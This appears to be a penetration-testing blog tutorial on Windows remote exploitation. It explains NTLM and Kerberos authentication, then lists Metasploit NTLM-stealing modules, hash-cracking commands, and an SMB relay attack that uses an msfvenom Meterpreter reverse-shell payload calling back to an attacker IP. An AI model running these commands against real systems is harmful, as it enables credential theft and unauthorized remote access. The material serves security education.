Windows Remote Exploitation
Introduction
In this blog post, we will learn the Windows Remote Exploitation Techniques and Approaches to engage with a target. We will also look for examples and usage of tools.
Some Approaches we have already discussed in Linux exploitation modules
Lower Hanging Fruits
We have discussed Low Hanging Fruits Approaches in Linux Exploitation module, the approach is also same for windows, please have a look on that blog post .
Remote Exploitation of Windows Network
The exploitation process in which attackers exploit’s listening services on the target network and tries to get access to the target system.
Windows Authentication
Windows uses two types of authentication protocols for clients and server authentication, NTLM and Kerberos.
NTLM
NTLM(New Technology LAN Manager) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems.
How NTLM Works?
-
A user accesses a client computer and provides a domain name, user name, and password. The client computes a cryptographic hash of the password and discards the actual password.
-
The client sends the username to the server to authenticate itself.
-
Then the server generates a 16-byte random number, called a challenge or nonce, and sends it to the requested client.
-
After that client encrypts this challenge with the hash of the user’s password and sends the response of the result to the server.
-
Then the server sends, user name, challenge sent to the client, the response received from the client, to the domain controller(Authentication Server).
-
The domain controller uses the user name to retrieve the hash of the user’s password from the SAM (Security Account Manager) database. It uses this password hash to encrypt the challenge.
-
Then DC compares the encrypted challenge it computed (in step 6) to the response computed by the client (in step 4). If they are identical, authentication is successful for the client system.
Kerberos
Windows domains use Kerberos as the underlying protocol for SSO. A user can log on to the domain at the beginning of the workday, and the system uses the same credentials to access any resources in the domain. Kerberos is also used by Unix systems nowadays
How Kerberos Works?
-
A user accesses a client computer sends an authentication request to the Kerberos server including user login ID.
-
The authentication server reply including encrypted symmetric key and time-stamped ticket-granting ticket (TGT)
-
Then the client sends a network authentication request including TGT and name of the target server, for example, MS Active Directory.
-
After that Kerberos server reply including session ticket for use with the target server
-
The client presents a time-stamped session ticket to the target server as the authentication
-
Finally, the target server provides authentication back to the client.
Authentication Successful!!
Also have a look at Windows Security Identifiers (SID) Important.
Some NTLM Stealing Metasploit Modules
auxiliary/admin/mssql/mssql_ntlm_stealer
auxiliary/admin/mssql/mssql_ntlm_stealer
Oracle SMB Relay Code Execution
auxiliary/admin/oracle/ora_ntlm_stealer
Host Information Enumeration via NTLM Authentication
auxiliary/scanner/http/ntlm_info_enumeration
SMTP NTLM Domain Extraction
auxiliary/scanner/smtp/smtp_ntlm_domain
WinRM Login Utility
This module attempts to authenticate to a WinRM service.
auxiliary/scanner/winrm/winrm_login
To crack NTLM hash
There are many techniques to crack NTLM hash
john --format=netlm hashpwd_netntlm
Using Rainbow Tables To Crack Hash
Download rainbow tables
[http://project-rainbowcrack.com/table.htm] [http://ophcrack.sourceforge.net/tables.php]
rcracki_mt -h 1f548398f0f49ea1 -t 4 *.rti
- -h: It is used to specify the first 8-bytes of the LMHASH
- -t: It is the number of threads to use
- *.rti: It is the path of the downloaded rainbow tables
** Suppose if you found only half of the password**
In ‘‘ls /usr/share/metasploit-framework/tools/password’’
There is a tool also which can also use for this purpose known as ruby halflm_second.rb.
ruby halflm_second.rb -n 1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p HALFPSWD
To convert the result into case sensitive password
perl netntlm.pl -file /root/hashpwd_netntlm -seed FULLHALFPSWD
SMBRelay Attack
Its a kind of Man in The Middle attack in which attacker relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful.
Metasploit Module for this purpose
msfconsole
use exploit windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > info
Read about this module by info command on Metasploit
Another Exploit for SMBRelay, Click Here
You can also use Impacket’s smbrelayx.py for this purpose.
smbrelayx.py: Exploit for CVE-2015-0005 using an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.
Using Msfvenom create windows reverse TCP .exe payload in order to work with smbrelayx.py
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<Port> -f exe -o hacker.exe
Start Metasploit Multi/handler in Attacker Machine
set exploit/multi/handler
Set the options and use smbrelayx.py
smbrelayx.py -h <TargetIP> -e /home/hacker.exe
To check and use other windows vulnerability’s exploit
Run command below in msfconsole
show exploits windows
Conclusion
We have discussed basic exploitation of windows systems, and we have already discussed some approaches in previous phases, Exploitation all depends on the previous phases of pentesting